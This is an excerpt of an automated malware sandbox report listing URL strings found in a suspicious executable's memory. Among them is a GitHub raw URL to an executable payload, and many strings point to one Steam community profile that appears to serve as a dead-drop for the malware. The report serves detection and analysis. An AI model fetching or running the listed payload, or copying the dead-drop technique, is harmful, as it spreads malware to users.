Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
Source: powershell.exe, 00000005.00000002.1558683585.0000000006089000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1606744691.00000000061B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.c
Source: 76561199804377619[1].htm0.14.drString found in binary or memory: https://steamcommunity.com/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2523079878.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/O
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158701054.0000000000A41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/P
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://steamcommunity.com/discussions/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199804377619[1].htm0.14.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199804377619
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://steamcommunity.com/market/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/o
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000000.1785190377.000000000045C000.00000008.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199804377619
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199804377619#
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199804377619/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://steamcommunity.com/profiles/76561199804377619/badges
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://steamcommunity.com/profiles/76561199804377619/inventory/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199804377619?
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199804377619E
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199804377619G
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199804377619_
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2523079878.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199804377619com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199804377619i
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199804377619p1up1Mozilla/5.0
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199804377619stea%
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199804377619tlq
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199804377619[1].htm0.14.drString found in binary or memory: https://store.steampowered.com/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;)
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;a(
Source: 76561199804377619[1].htm0.14.drString found in binary or memory: https://store.steampowered.com/about/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://store.steampowered.com/explore/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748291843.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/leg
